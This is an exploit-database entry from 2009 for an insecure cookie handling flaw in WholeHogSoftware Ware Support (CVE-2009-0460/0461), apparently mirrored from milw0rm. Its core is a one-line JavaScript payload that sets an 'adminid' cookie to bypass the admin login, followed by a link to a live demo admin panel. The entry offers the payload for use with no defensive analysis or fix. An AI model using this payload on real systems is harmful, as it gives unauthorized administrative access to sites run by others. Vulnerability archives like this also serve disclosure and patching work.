WholeHogSoftware Ware Support - Insecure Cookie Handling



EKU-ID: 15787 CVE: OSVDB-51734;CVE-2009-0461;CVE-2009-0460 OSVDB-ID:
Author: Stack Published: 2009-02-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


###########################################################################
[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
[+] Script   :Ware Support
[+] Site     :http://wholehogsoftware.com
[+] Detay    :http://wholehogsoftware.com/index.php/page/ware_support
[+] Discovered By Mountassif Moad

[+] www.v4-team.com

[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/support/admin/

# milw0rm.com [2009-02-03]